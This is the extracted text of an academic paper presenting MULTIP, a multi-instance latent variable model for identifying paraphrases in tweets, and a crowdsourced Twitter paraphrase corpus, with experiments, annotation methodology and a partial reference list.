adaptation. In Proceedings of the ACL. 528 work_n2ajueo2ozfp5hcybnms5ep22a ---- Extracting Lexically Divergent Paraphrases from Twitter Wei Xu1, Alan Ritter2, Chris Callison-Burch1, William B. Dolan3 and Yangfeng Ji4 1 University of Pennsylvania, Philadelphia, PA, USA {xwe, ccb}@cis.upenn.edu 2 The Ohio State University, Columbus, OH, USA ritter.1492@osu.edu 3 Microsoft Research, Redmond, WA, USA billdol@microsoft.com 4 Georgia Institute of Technology, Atlanta, GA, USA jiyfeng@gatech.edu Abstract We present MULTIP (Multi-instance Learn- ing Paraphrase Model), a new model suited to identify paraphrases within the short mes- sages on Twitter. We jointly model para- phrase relations between word and sentence pairs and assume only sentence-level annota- tions during learning. Using this principled la- tent variable model alone, we achieve the per- formance competitive with a state-of-the-art method which combines a latent space model with a feature-based supervised classifier. Our model also captures lexically divergent para- phrases that differ from yet complement previ- ous methods; combining our model with pre- vious work significantly outperforms the state- of-the-art. In addition, we present a novel an- notation methodology that has allowed us to crowdsource a paraphrase corpus from Twit- ter. We make this new dataset available to the research community. 1 Introduction Paraphrases are alternative linguistic expressions of the same or similar meaning (Bhagat and Hovy, 2013). Twitter engages millions of users, who nat- urally talk about the same topics simultaneously and frequently convey similar meaning using diverse linguistic expressions. The unique characteristics of this user-generated text presents new challenges and opportunities for paraphrase research (Xu et al., 2013b; Wang et al., 2013). For many applications, like automatic summarization, first story detection (Petrović et al., 2012) and search (Zanzotto et al., 2011), it is crucial to resolve redundancy in tweets (e.g. oscar nom’d doc ↔ Oscar-nominated docu- mentary). In this paper, we investigate the task of determin- ing whether two tweets are paraphrases. Previous work has exploited a pair of shared named entities to locate semantically equivalent patterns from re- lated news articles (Shinyama et al., 2002; Sekine, 2005; Zhang and Weld, 2013). But short sentences in Twitter do not often mention two named entities (Ritter et al., 2012) and require nontrivial general- ization from named entities to other words. For ex- ample, consider the following two sentences about basketball player Brook Lopez from Twitter: ◦ That boy Brook Lopez with a deep 3 ◦ brook lopez hit a 3 and i missed it Although these sentences do not have many words in common, the identical word “3” is a strong indicator that the two sentences are paraphrases. We therefore propose a novel joint word-sentence approach, incorporating a multi-instance learning assumption (Dietterich et al., 1997) that two sen- tences under the same topic (we highlight topics in bold) are paraphrases if they contain at least one word pair (we call it an anchor and highlight with underscores; the words in the anchor pair need not be identical) that is indicative of sentential para- phrase. This at-least-one-anchor assumption might be ineffective for long or randomly paired sentences, but holds up better for short sentences that are tem- porally and topically related on Twitter. Moreover, our model design (see Figure 1) allows exploitation of arbitrary features and linguistic resources, such as part-of-speech features and a normalization lex- (a) (b) Figure 1: (a) a plate representation of the MULTIP model (b) an example instantiation of MULTIP for the pair of sentences “Manti bout to be the next Junior Seau” and “Teo is the little new Junior Seau”, in which a new American football player Manti Te’o was being compared to a famous former player Junior Seau. Only 4 out of the total 6×5 word pairs, z1 - z30, are shown here. icon, to discriminatively determine word pairs as paraphrastic anchors or not. Our graphical model is a major departure from popular surface- or latent- similarity methods (Wan et al., 2006; Guo and Diab, 2012; Ji and Eisenstein, 2013, and others). Our approach to extract para- phrases from Twitter is general and can be com- bined with various topic detecting solutions. As a demonstration, we use Twitter’s own trending topic service1 to collect data and conduct experiments. While having a principled and extensible design, our model alone achieves performance on par with a state-of-the-art ensemble approach that involves both latent semantic modeling and supervised classi- fication. The proposed model also captures radically different paraphrases from previous approaches; a combined system shows significant improvement over the state-of-the-art. This paper makes the following contributions: 1) We present a novel latent variable model for paraphrase identification, that specifically ac- commodates the very short context and di- vergent wording in Twitter data. We exper- imentally compare several representative ap- proaches and show that our proposed method 1More information about Twitter’s trends: https://support.twitter.com/articles/ 101125-faqs-about-twitter-s-trends yields state-of-the-art results and identifies paraphrases that are complementary to previ- ous methods. 2) We develop an efficient crowdsourcing method and construct a Twitter Paraphrase Corpus of about 18,000 sentence pairs, as a first common testbed for the development and comparison of paraphrase identification and semantic similar- ity systems. We make this dataset available to the research community.2 2 Joint Word-Sentence Paraphrase Model We present a new latent variable model that jointly captures paraphrase relations between sentence pairs and word pairs. It is very different from previous ap- proaches in that its primary design goal and motiva- tion is targeted towards short, lexically diverse text on the social web. 2.1 At-least-one-anchor Assumption Much previous work on paraphrase identification has been developed and evaluated on a specific benchmark dataset, the Microsoft Research Para- phrase Corpus (Dolan et al., 2004), which is de- 2The dataset and code are made available at: SemEval-2015 shared task http://alt.qcri.org/semeval2015/ task1/ and https://github.com/cocoxu/ twitterparaphrase/ Corpus Examples News ◦ Revenue in the first quarter of the year dropped 15 percent from the same period a year earlier. ◦ With the scandal hanging over Stewart’s company, revenue in the first quarter of the year dropped 15 percent from the same period a year earlier. (Dolan and Brockett, 2005) ◦ The Senate Select Committee on Intelligence is preparing a blistering report on prewar intelligence on Iraq. ◦ American intelligence leading up to the war on Iraq will be criticized by a pow- erful US Congressional committee due to report soon, officials said today. ◦ Can Klay Thompson wake up ◦ Cmon Klay need u to get it going Twitter (This Work) ◦ Ezekiel Ansah wearing 3D glasses wout the lens ◦ Wait Ezekiel ansah is wearing 3d movie glasses with the lenses knocked out ◦ Marriage equality law passed in Rhode Island ◦ Congrats to Rhode Island becoming the 10th state to enact marriage equality Table 1: Representative examples from paraphrase corpora. The average sentence length is 11.9 words in Twitter vs. 18.6 in the news corpus. rived from news articles. Twitter data is very dif- ferent, as shown in Table 1. We observe that among tweets posted around the same time about the same topic (e.g. a named entity), sentential paraphrases are short and can often be “anchored” by lexical paraphrases. This intuition leads to the at-least-one- anchor assumption we stated in the introduction. The anchor could be a word the two sentences share in common. It also could be a pair of different words. For example, the word pair “next ‖ new” in two tweets about a new player Manti Te’o to a fa- mous former American football player Junior Seau: ◦ Manti bout to be the next Junior Seau ◦ Teo is the little new Junior Seau Further note that not every word pair of similar meaning indicates sentence-level paraphrase. For example, the word “3”, shared by two sentences about movie “Iron Man” that refers to the 3rd se- quel of the movie, is not a paraphrastic anchor: ◦ Iron Man 3 was brilliant fun ◦ Iron Man 3 tonight see what this is like Therefore, we use a discriminative model at the word-level to incorporate various features, such as part-of-speech features, to determine how probable a word pair is a paraphrase anchor. 2.2 Multi-instance Learning Paraphrase Model (MULTIP) The at-least-one-anchor assumption naturally leads to a multi-instance learning problem (Dietterich et al., 1997), where the learner only observes labels on bags of instances (i.e. sentence-level paraphrases in this case) instead of labels on each individual in- stance (i.e. word pair). We formally define an undirected graphical model of multi-instance learning for paraphrase identifica- tion – MULTIP. Figure 1 shows the proposed model in plate form and gives an example instantiation. The model has two layers, which allows joint rea- soning between sentence-level and word-level com- ponents. For each pair of sentences si = (si1,si2), there is an aggregate binary variable yi that represents whether they are paraphrases, and which is observed in the labeled training data. Let W(sik) be the set of words in the sentence sik , excluding the topic names. For each word pair wj = (wj1,wj2) ∈ W(si1) × W(si2), there exists a latent variable zj which denotes whether the word pair is a paraphrase anchor. In total there are m = |W(si1)|× |W(si2)| word pairs, and thus zi = z1,z2, ...,zj, ...,zm. Our at-least-one-anchor assumption is realized by a deterministic-or function; that is, if there exists at least one j such that zj = 1, then the sentence pair is a paraphrase. Our conditional paraphrase identification model is defined as follows: P(zi,yi|wi;θ) = m∏ j=1 φ(zj,wj;θ)×σ(zi,yi) = m∏ j=1 exp(θ ·f(zj,wj))×σ(zi,yi) (1) where f(zj,wj) is a vector of features extracted for the word pair wj, θ is the parameter vector, and σ is the factor that corresponds to the deterministic-or constraint: σ(zi,yi) =   1 if yi = true∧∃j : zj = 1 1 if yi = false∧∀j : zj = 0 0 otherwise (2) 2.3 Learning To learn the parameters of the word-level paraphrase anchor classifier, θ, we maximize likelihood over the sentence-level annotations in our paraphrase corpus: θ∗ = arg max θ P(y|w;θ) = arg max θ ∏ i ∑ zi P(zi,yi|wi;θ) (3) An iterative gradient-ascent approach is used to estimate θ using perceptron-style additive updates (Collins, 2002; Liang et al., 2006; Zettlemoyer and Collins, 2007; Hoffmann et al., 2011). We define an update based on the gradient of the conditional log likelihood using Viterbi approximation, as follows: ∂ log P(y|w;θ) ∂θ = EP(z|w,y;θ)( ∑ i f(zi, wi)) − EP(z,y|w;θ)( ∑ i f(zi, wi)) ≈ ∑ i f(z∗i , wi)− ∑ i f(z′i, wi) (4) where we define the feature sum for each sentence f(zi, wi) = ∑ j f(zj,wj) over all word pairs. These two above expectations are approximated by solving two simple inference problems as maxi- mizations: z∗ = arg max z P(z|w, y;θ) y′, z′ = arg max y,z P(z, y|w;θ) (5) Input: a training set {(si,yi)|i = 1...n}, where i is an index corresponding to a particular sentence pair si, and yi is the training label. 1: initialize parameter vector θ ← 0 2: for i ← 1 to n do 3: extract all possible word pairs wi = w1,w2, ...,wm and their features from the sentence pair si 4: end for 5: for l ← 1 to maximum iterations do 6: for i ← 1 to n do 7: (y′i, z ′ i) ← arg maxyi,zi P(zi,yi|wi;θ) 8: if y′i 6= yi then 9: z∗i ← arg maxzi P(zi|wi,yi;θ) 10: θ ← θ + f(z∗i , wi)−f(z ′ i, wi) 11: end if 12: end for 13: end for 14: return model parameters θ Figure 2: MULTIP Learning Algorithm Computing both z′ and z∗ are rather straightfor- ward under the structure of our model and can be solved in time linear in the number of word pairs. The dependencies between z and y are defined as deterministic-or factors σ(zi,yi), which when sat- isfied do not affect the overall probability of the solution. Each sentence pair is independent con- ditioned on the parameters. For z′, it is sufficient to independently compute the most likely assign- ment z′i for each word pair, ignoring the determin- istic dependencies. y′i is then set by aggregating all z′i through the deterministic-or operation. Sim- ilarly, we can find the exact solution for z∗, the most likely assignment that respects the sentence- level training label y. For a positive training in- stance, we simply find its highest scored word pair wτ by the word-level classifier, then set z∗τ = 1 and z∗j = arg maxx∈0,1 φ(x,wj;θ) for all j 6= τ; for a negative example, we set z∗i = 0. The time com- plexity of both inferences for one sentence pair is O(|W(s)|2), where |W(s)|2 is the number of word pairs. In practice, we use online learning instead of opti- mizing the full objective. The detailed learning algo- rithm is presented in Figure 2. Following Hoffmann et al. (2011), we use 50 iterations in the experiments. 2.4 Feature Design At the word-level, our discriminative model allows use of arbitrary features that are similar to those in monolingual word alignment models (MacCartney et al., 2008; Thadani and McKeown, 2011; Yao et al., 2013a,b). But unlike discriminative mono- lingual word alignment, we only use sentence-level training labels instead of word-level alignment annotation. For every word pair, we extract the following features: String Features that indicate whether the two words, their stemmed forms and their normalized forms are the same, similar or dissimilar. We used the Morpha stemmer (Minnen et al., 2001),3 Jaro-Winkler string similarity (Winkler, 1999) and the Twitter normalization lexicon by Han et al. (2012). POS Features that are based on the part-of-speech tags of the two words in the pair, specifying whether the two words have same or different POS tags and what the specific tags are. We use the Twitter Part-Of-Speech tagger developed by Derczynski et al. (2013). We add new fine-grained tags for variations of the eight words: “a”, “be”, “do”, “have”, “get”, “go”, “follow” and “please”. For example, we use a tag HA for words “have”, “has” and “had”. Topical Features that relate to the strength of a word’s association to the topic. This feature identifies the popular words in each topic, e.g. “3” in tweets about basketball game, “RIP” in tweets about a celebrity’s death. We use G2 log-likelihood- ratio statistic, which has been frequently used in NLP, as a measure of word associations (Dunning, 1993; Moore, 2004). The significant scores are computed for each trend on an average of about 1500 sentences and converted to binary features for every word pair, indicating whether the two words are both significant or not. Our topical features are novel and were not used in previous work. Following Riedel et al. (2010) and Hoffmann et al. (2011), we also incor- porate conjunction features into our system for bet- ter accuracy, namely Word+POS, Word+Topical and Word+POS+Topical features. 3https://github.com/knowitall/morpha 3 Experiments 3.1 Data It is nontrivial to gather a gold-standard dataset of naturally occurring paraphrases and non- paraphrases efficiently from Twitter, since this requires pairwise comparison of tweets and faces a very large search space. To make this annotation task tractable, we design a novel and efficient crowdsourcing method using Amazon Mechanical Turk. Our entire data collection process is de- tailed in Section §4, with several experiments that demonstrate annotation quality and efficiency. In total, we constructed a Twitter Paraphrase Cor- pus of 18,762 sentence pairs and 19,946 unique sen- tences. The training and development set consists of 17,790 sentence pairs posted between April 24th and May 3rd, 2014 from 500+ trending topics (ex- cluding hashtags). Our paraphrase model and data collection approach is general and can be combined with various Twitter topic detecting solutions (Diao et al., 2012; Ritter et al., 2012). As a demonstra- tion, we use Twitter’s own trends service since it is easily available. Twitter trending topics are de- termined by an unpublished algorithm, which finds words, phrases and hashtags that have had a sharp increase in popularity, as opposed to overall vol- ume. We use case-insensitive exact matching to lo- cate topic names in the sentences. Each sentence pair was annotated by 5 different crowdsourcing workers. For the test set, we ob- tained both crowdsourced and expert labels on 972 sentence pairs from 20 randomly sampled Twitter trending topics between May 13th and June 10th. Our dataset is more realistic and balanced, contain- ing 79% non-paraphrases vs. 34% in the benchmark Microsoft Paraphrase Corpus of news data. As noted in (Das and Smith, 2009), the lack of natural non- paraphrases in the MSR corpus creates bias towards certain models. 3.2 Baselines We use four baselines to compare with our proposed approach for the sentential paraphrase identification task. For the first baseline, we choose a super- vised logistic regression (LR) baseline used by Das and Smith (2009). It uses simple n-gram (also in stemmed form) overlapping features but shows very Method F1 Precision Recall Random 0.294 0.208 0.500 WTMF (Guo and Diab, 2012)* 0.583 0.525 0.655 LR (Das and Smith, 2009)** 0.630 0.629 0.632 LEXLATENT 0.641 0.663 0.621 LEXDISCRIM (Ji and Eisenstein, 2013) 0.645 0.664 0.628 MULTIP 0.724 0.722 0.726 Human Upperbound 0.823 0.752 0.908 Table 2: Performance of different paraphrase identification approaches on Twitter data. *An enhanced version that uses additional 1.6 million sentences from Twitter. ** Reimplementation of a strong baseline used by Das and Smith (2009). competitive performance on the MSR corpus. The second baseline is a state-of-the-art unsu- pervised method, Weighted Textual Matrix Factor- ization (WTMF),4 which is specially developed for short sentences by modeling the semantic space of both words that are present in and absent from the sentences (Guo and Diab, 2012). The origi- nal model was learned from WordNet (Fellbaum, 2010), OntoNotes (Hovy et al., 2006), Wiktionary, the Brown corpus (Francis and Kucera, 1979). We enhance the model with 1.6 million sentences from Twitter as suggested by Guo et al. (2013). Ji and Eisenstein (2013) presented a state-of- the-art ensemble system, which we call LEXDIS- CRIM.5 It directly combines both discriminatively- tuned latent features and surface lexical features into a SVM classifier. Specifically, the latent representa- tion of a pair of sentences ~v1 and ~v2 is converted into a feature vector, [~v1+ ~v2, |~v1−~v2|], by concatenating the element-wise sum ~v1 + ~v2 and absolute different |~v1 − ~v2|. We also introduce a new baseline, LEXLATENT, which is a simplified version of LEXDISCRIM and easy to reproduce. It uses the same method to com- bine latent features and surface features, but com- bines the open-sourced WTMF latent space model and the logistic regression model from above in- stead. It achieves similar performance as LEXDIS- CRIM on our dataset (Table 2). 4The source code and data for WTMF is available at: http://www.cs.columbia.edu/˜weiwei/code. html 5The parsing feature was removed because it was not helpful on our Twitter dataset. 3.3 System Performance For evaluation of different systems, we compute precision-recall curves and report the highest F1 measure of any point on the curve, on the test dataset of 972 sentence pairs against the expert labels. Ta- ble 2 shows the performance of different systems. Our proposed MULTIP, a principled latent variable model alone, achieves competitive results with the state-of-the-art system that combines discriminative training and latent semantics. In Table 2, we also show the agreement levels of labels derived from 5 non-expert annotations on Me- chanical Turk, which can be considered as an up- perbound for automatic paraphrase recognition task performed on this data set. The annotation quality of our corpus is surprisingly good given the fact that the definition of paraphrase is rather inexact (Bhagat and Hovy, 2013); the inter-rater agreement between expert annotators on news data is only 0.83 as re- ported by Dolan et al. (2004). F1 Prec Recall MULTIP 0.724 0.722 0.726 - String features 0.509 0.448 0.589 - POS features 0.496 0.350 0.851 - Topical features 0.715 0.694 0.737 Table 3: Feature ablation by removing each individ- ual feature group from the full set. To assess the impact of different features on the model’s performance, we conduct feature ablation experiments, removing one group of features at a time. The results are shown in Table 3. Both string Para? Sentence Pair from Twitter MULTIP LEXLATENT YES ◦ The new Ciroc flavor has arrived rank=12 rank=266 ◦ Ciroc got a new flavor comin out YES ◦ Roberto Mancini gets the boot from Man City rank=64 rank=452 ◦ Roberto Mancini has been sacked by Manchester City with the Blues saying YES ◦ I want to watch the purge tonight rank=136 rank=11 ◦ I want to go see The Purge who wants to come with NO ◦ Somebody took the Marlins to 20 innings rank= 8 rank=54 ◦ Anyone who stayed 20 innings for the marlins NO ◦ WORLD OF JENKS IS ON AT 11 rank=167 rank=9 ◦ World of Jenks is my favorite show on tv Table 4: Example system outputs; rank is the position in the list of all candidate paraphrase pairs in the test set ordered by model score. MULTIP discovers lexically divergent paraphrases while LEXLATENT prefers more overall sentence similarity. Underline marks the word pair(s) with highest estimated probability as paraphrastic anchor(s) for each sentence pair. 0.0 0.2 0.4 0.6 0.8 1.0 0. 0 0. 2 0. 4 0. 6 0. 8 1. 0 Recall P re ci si on MULTIP LEXLATENT 0.0 0.2 0.4 0.6 0.8 1.0 0. 0 0. 2 0. 4 0. 6 0. 8 1. 0 Recall P re ci si on MULTIP−PE LEXLATENT Figure 3: Precision and recall curves. Our MULTIP model alone achieves competitive performance with the LEXLATENT system that combines latent space model and feature-based supervised classifier. The two approaches have complementary strengths, and achieves significant improvement when combined together (MULTIP-PE). and POS features are essential for system perfor- mance, while topical features are helpful but not as crucial. Figure 3 presents precision-recall curves and shows the sensitivity and specificity of each model in comparison. In the first half of the curve (recall < 0.5), MULTIP model makes bolder and less ac- curate decisions than LEXLATENT. However, the curve for MULTIP model is more flat and shows con- sistently better precision at the second half (recall > 0.5) as well as a higher maximum F1 score. This re- sult reflects our design concept of MULTIP, which is intended to pick up sentential paraphrases with more divergent wordings aggressively. LEXLATENT, as a combined system, considers sentence features in both surface and latent space and is more conserva- tive. Table 4 further illustrates this difference with some example system outputs. 3.4 Product of Experts (MULTIP-PE) Our MULTIP model and previous similarity-based approaches have complementary strengths, so we experiment with combining MULTIP (Pm) and LEXLATENT (Pl) through a product of experts (Hinton, 2002): P(y|s1,s2) = Pm(y|s1,s2)×Pl(y|s1,s2)∑ y Pm(y|s1,s2)×Pl(y|s1,s2) (6) The resulting system MULTIP-PE provides con- sistently better precision and recall over the LEXLATENT model, as shown on the right in Figure 3. The MULTIP-PE system outperforms LEXLATENT significantly according to a paired t- test with ρ less than 0.05. Our proposed MUL- TIP takes advantage of Twitter’s specific properties and provides complementary information to previ- ous approaches. Previously, Das and Smith (2009) has also used a product of experts to combine a lex- ical and a syntax-based model together. 4 Constructing Twitter Paraphrase Corpus We now turn to describing our data collection and annotation methodology. Our goal is to construct a high quality dataset that contains representative ex- amples of paraphrases and non-paraphrases in Twit- ter. Since Twitter users are free to talk about any- thing regarding any topic, a random pair of sen- tences about the same topic has a low chance (less than 8%) of expressing the same meaning. This causes two problems: a) it is expensive to obtain paraphrases via manual annotation; b) non-expert annotators tend to loosen the criteria and are more likely to make false positive errors. To address these challenges, we design a simple annotation task and introduce two selection mechanisms to select sentences which are more likely to be paraphrases, while preserving diversity and representativeness. 4.1 Raw Data from Twitter We crawl Twitter’s trending topics and their associ- ated tweets using public APIs.6 According to Twit- ter, trends are determined by an algorithm which 6More information about Twitter’s APIs: https://dev. twitter.com/docs/api/1.1/overview expert=0 expert=1 expert=2 expert=3 expert=4 expert=5 tu rk =0 tu rk =1 tu rk =2 tu rk =3 tu rk =4 tu rk =5 Figure 4: A heat-map showing overlap between expert and crowdsourcing annotation. The inten- sity along the diagonal indicates good reliability of crowdsourcing workers for this particular task; and the shift above the diagonal reflects the difference between the two annotation schemas. For crowd- sourcing (turk), the numbers indicate how many an- notators out of 5 picked the sentence pair as para- phrases; 0,1 are considered non-paraphrases; 3,4,5 are paraphrases. For expert annotation, all 0,1,2 are non-paraphrases; 4,5 are paraphrases. Medium- scored cases are discarded in training and testing in our experiments. identifies topics that are immediately popular, rather than those that have been popular for longer periods of time or which trend on a daily basis. We tokenize and split each tweet into sentences.7 4.2 Task Design on Mechanical Turk We show the annotator an original sentence, then ask them to pick sentences with the same mean- ing from 10 candidate sentences. The original and candidate sentences are randomly sampled from the same topic. For each such 1 vs. 10 question, we ob- tain binary judgements from 5 different annotators, paying each annotator $0.02 per question. On aver- age, each question takes one annotator about 30 ∼ 45 seconds to answer. 4.3 Annotation Quality We remove problematic annotators by checking their Cohen’s Kappa agreement (Artstein and Poe- 7We use the toolkit developed by O’Connor et al. (2010): https://github.com/brendano/tweetmotif Reggie Miller Amber Robert Woods Candice The Clippers Ryu Jeff Green Harvick Milwaukee Klay Huck Morning Momma Dee Dortmund Ronaldo Netflix GWB Dwight Howard Facebook U.S. 0.0 0.2 0.4 0.6 0.8 filtered random Percentage of Positive Judgements Tr e n d in g T o p ic s Figure 5: The proportion of paraphrases (percentage of positive votes from annotators) vary greatly across different topics. Automatic filtering in Section 4.4 roughly doubles the paraphrase yield. sio, 2008) with other annotators. We also compute inter-annotator agreement with an expert annotator on 971 sentence pairs. In the expert annotation, we adopt a 5-point Likert scale to measure the degree of semantic similarity between sentences, which is defined by Agirre et al. (2012) as follows: 5: Completely equivalent, as they mean the same thing; 4: Mostly equivalent, but some unimportant details differ; 3: Roughly equivalent, but some important informa- tion differs/missing. 2: Not equivalent, but share some details; 1: Not equivalent, but are on the same topic; 0: On different topics. Although the two scales of expert and crowd- sourcing annotation are defined differently, their Pearson correlation coefficient reaches 0.735 (two- tailed significance 0.001). Figure 4 shows a heat- map representing the detailed overlap between the two annotations. It suggests that the graded simi- larity annotation task could be reduced to a binary choice in a crowdsourcing setup. 4.4 Automatic Summarization Inspired Sentence Filtering We filter the sentences within each topic to se- lect more probable paraphrases for annotation. Our method is inspired by a typical problem in extractive summarization, that the salient sentences are likely redundant (paraphrases) and need to be removed in the output summaries. We employ the scoring method used in SumBasic (Nenkova and Vander- wende, 2005; Vanderwende et al., 2007), a simple but powerful summarization system, to find salient sentences. For each topic, we compute the probabil- ity of each word P(wi) by simply dividing its fre- quency by the total number of all words in all sen- tences. Each sentence s is scored as the average of the probabilities of the words in it, i.e. Salience(s) = ∑ wi∈s P(wi) |{wi|wi ∈ s}| (7) We then rank the sentences and pick the original sentence randomly from top 10% salient sentences and candidate sentences from top 50% to present to the annotators. In a trial experiment of 20 topics, the filtering technique double the yield of paraphrases from 152 to 329 out of 2000 sentence pairs over naı̈ve ran- dom sampling (Figure 5 and Figure 6). We also use PINC (Chen and Dolan, 2011) to measure the qual- ity of paraphrases collected (Figure 7). PINC was designed to measure n-gram dissimilarity between two sentences, and in essence it is the inverse of BLEU. In general, the cases with high PINC scores include more complex and interesting rephrasings. 5 4 3 2 1 0 100 200 300 400 random filtered MAB Number of Annotators Judging as Paraphrases (out of 5) N um be r o f S en te nc e Pa irs (o ut o f 2 00 0) Figure 6: Numbers of paraphrases collected by dif- ferent methods. The annotation efficiency (3,4,5 are regarded as paraphrases) is significantly im- proved by the sentence filtering and Multi-Armed Bandits (MAB) based topic selection. 5 4 3 2 1 0 0.75 0.80 0.85 0.90 0.95 1.00 random filtered MAB Number of Annotators Judging as Paraphrases (out of 5) P IN C (l ex ic al d is si m ila rit y) Figure 7: PINC scores of paraphrases collected. The higher the PINC, the more significant the re- wording. Our proposed annotation strategy quadru- ples paraphrase yield, while not greatly reducing diversity as measured by PINC. 4.5 Topic Selection using Multi-Armed Bandits (MAB) Algorithm Another approach to increasing paraphrase yield is to choose more appropriate topics. This is partic- ularly important because the number of paraphrases varies greatly from topic to topic and thus the chance to encounter paraphrases during annotation (Fig- ure 5). We treat this topic selection problem as a variation of the Multi-Armed Bandit (MAB) prob- lem (Robbins, 1985) and adapt a greedy algorithm, the bounded �-first algorithm, of Tran-Thanh et al. (2012) to accelerate our corpus construction. Our strategy consists of two phases. In the first exploration phase, we dedicate a fraction of the to- tal budget, �, to explore randomly chosen arms of each slot machine (trending topic on Twitter), each m times. In the second exploitation phase, we sort all topics according to their estimated proportion of paraphrases, and sequentially annotate d(1−�)B l−m e arms that have the highest estimated reward until reaching the maximum l = 10 annotations for any topic to insure data diversity. We tune the parameters m to be 1 and � to be be- tween 0.35 ∼ 0.55 through simulation experiments, by artificially duplicating a small amount of real an- notation data. We then apply this MAB algorithm in the real-world. We explore 500 random topics and then exploited 100 of them. The yield of para- phrases rises to 688 out of 2000 sentence pairs by using MAB and sentence filtering, a 4-fold increase compared to only using random selection (Figure 6). 5 Related Work Automatic Paraphrase Identification has been widely studied (Androutsopoulos and Malakasiotis, 2010; Madnani and Dorr, 2010). The ACL Wiki gives an excellent summary of various techniques.8 Many recent high-performance approaches use sys- tem combination (Das and Smith, 2009; Madnani et al., 2012; Ji and Eisenstein, 2013). For exam- ple, Madnani et al. (2012) combines multiple sophis- ticated machine translation metrics using a meta- classifier. An earlier attempt on Twitter data is that of Xu et al. (2013b). They limited the search space to only the tweets that explicitly mention a same date and a same named entity, however there remain a considerable amount of mislabels in their data.9 Zanzotto et al. (2011) also experimented with SVM tree kernel methods on Twitter data. Departing from the previous work, we propose a latent variable model to jointly infer the corre- spondence between words and sentences. It is re- lated to discriminative monolingual word alignment (MacCartney et al., 2008; Thadani and McKeown, 8http://aclweb.org/aclwiki/index.php? title=Paraphrase_Identification_(State_of_ the_art) 9The data is released by Xu et al. (2013b) at: https:// github.com/cocoxu/twitterparaphrase/ 2011; Yao et al., 2013a,b), but different in that the paraphrase task requires additional sentence align- ment modeling with no word alignment data. Our approach is also inspired by Fung and Cheung’s (2004a; 2004b) work on bootstrapping bilingual par- allel sentence and word translations from compara- ble corpora. Multiple Instance Learning (Dietterich et al., 1997) has been used by different research groups in the field of information extraction (Riedel et al., 2010; Hoffmann et al., 2011; Surdeanu et al., 2012; Ritter et al., 2013; Xu et al., 2013a). The idea is to leverage structured data as weak supervision for tasks such as relation extraction. This is done, for example, by making the assumption that at least one sentence in the corpus which mentions a pair of en- tities (e1,e2) participating in a relation (r) expresses the proposition: r(e1,e2). Crowdsourcing Paraphrase Acquisition: Buzek et al. (2010) and Denkowski et al. (2010) focused specifically on collecting paraphrases of text to be translated to improve machine translation quality. Chen and Dolan (2011) gathered a large-scale para- phrase corpus by asking Mechanical Turk workers to caption the action in short video segments. Sim- ilarly, Burrows et al. (2012) asked crowdsourcing workers to rewrite selected excerpts from books. Ling et al. (2014) crowdsourced bilingual parallel text using Twitter as the source of data. In contrast, we design a simple crowdsourcing task requiring only binary judgements on sentences collected from Twitter. There are several advantages as compared to existing work: a) the corpus also covers a very diverse range of topics and linguistic expressions, especially colloquial language, which is different from and thus complements previous paraphrase corpora; b) the paraphrase corpus col- lected contains a representative proportion of both negative and positive instances, while lack of good negative examples was an issue in the previous re- search (Das and Smith, 2009); c) this method is scal- able and sustainable due to the simplicity of the task and real-time, virtually unlimited text supply from Twitter. 6 Conclusions This paper introduced MULTIP, a joint word- sentence model to learn paraphrases from tempo- rally and topically grouped messages in Twitter. While simple and principled, our model achieves performance competitive with a state-of-the-art en- semble system combining latent semantic represen- tations and surface similarity. By combining our method with previous work as a product-of-experts we outperform the state-of-the-art. Our latent- variable approach is capable of learning word-level paraphrase anchors given only sentence annotations. Because our graphical model is modular and ex- tensible (for example it should be possible to re- place the deterministic-or with other aggregators), we are optimistic this work might provide a path towards weakly supervised word alignment models using only sentence-level annotations. In addition, we presented a novel and efficient annotation methodology which was used to crowd- source a unique corpus of paraphrases harvested from Twitter. We make this resource available to the research community. Acknowledgments The author would like to thank editor Sharon Gold- water and three anonymous reviewers for their thoughtful comments, which substantially improved this paper. We also thank Ralph Grishman, Sameer Singh, Yoav Artzi, Mark Yatskar, Chris Quirk, Ani Nenkova and Mitch Marcus for their feedback. This material is based in part on research spon- sored by the NSF under grant IIS-1430651, DARPA under agreement number FA8750-13-2-0017 (the DEFT program) and through a Google Faculty Re- search Award to Chris Callison-Burch. The U.S. Government is authorized to reproduce and dis- tribute reprints for governmental purposes. The views and conclusions contained in this publication are those of the authors and should not be interpreted as representing official policies or endorsements of DARPA or the U.S. Government. Yangfeng Ji is supported by a Google Faculty Research Award awarded to Jacob Eisenstein. References Agirre, E., Diab, M., Cer, D., and Gonzalez-Agirre, A. (2012). Semeval-2012 task 6: A pilot on se- mantic textual similarity. In Proceedings of the First Joint Conference on Lexical and Computa- tional Semantics (*SEM). Androutsopoulos, I. and Malakasiotis, P. (2010). A survey of paraphrasing and textual entailment methods. Journal of Artificial Intelligence Re- search, 38. Artstein, R. and Poesio, M. (2008). Inter-coder agreement for computational linguistics. Compu- tational Linguistics, 34(4). Bhagat, R. and Hovy, E. (2013). What is a para- phrase? Computational Linguistics, 39(3). Burrows, S., Potthast, M., and Stein, B. (2012). Paraphrase acquisition via crowdsourcing and machine learning. Transactions on Intelligent Systems and Technology (ACM TIST). Buzek, O., Resnik, P., and Bederson, B. B. (2010). Error driven paraphrase annotation using Me- chanical Turk. In Proceedings of the Workshop on Creating Speech and Language Data with Ama- zon’s Mechanical Turk. Chen, D. L. and Dolan, W. B. (2011). Collecting highly parallel data for paraphrase evaluation. In Proceedings of the 49th Annual Meeting of the As- sociation for Computational Linguistics (ACL). Collins, M. (2002). Discriminative training methods for hidden Markov models: Theory and experi- ments with perceptron algorithms. In Proceed- ings of the Conference on Empirical Methods on Natural Language Processing (EMNLP). Das, D. and Smith, N. A. (2009). Paraphrase identi- fication as probabilistic quasi-synchronous recog- nition. In Proceedings of the Joint Conference of the 47th Annual Meeting of the Association for Computational Linguistics and the 4th Inter- national Joint Conference on Natural Language Processing of the Asian Federation of Natural Language Processing (ACL-IJCNLP). Denkowski, M., Al-Haj, H., and Lavie, A. (2010). Turker-assisted paraphrasing for English-Arabic machine translation. In Proceedings of the Work- shop on Creating Speech and Language Data with Amazon’s Mechanical Turk. Derczynski, L., Ritter, A., Clark, S., and Bontcheva, K. (2013). Twitter part-of-speech tagging for all: Overcoming sparse and noisy data. In Proceed- ings of the Recent Advances in Natural Language Processing (RANLP). Diao, Q., Jiang, J., Zhu, F., and Lim, E.-P. (2012). Finding bursty topics from microblogs. In Pro- ceedings of the 50th Annual Meeting of the Asso- ciation for Computational Linguistics (ACL). Dietterich, T. G., Lathrop, R. H., and Lozano-Pérez, T. (1997). Solving the multiple instance prob- lem with axis-parallel rectangles. Artificial Intel- ligence, 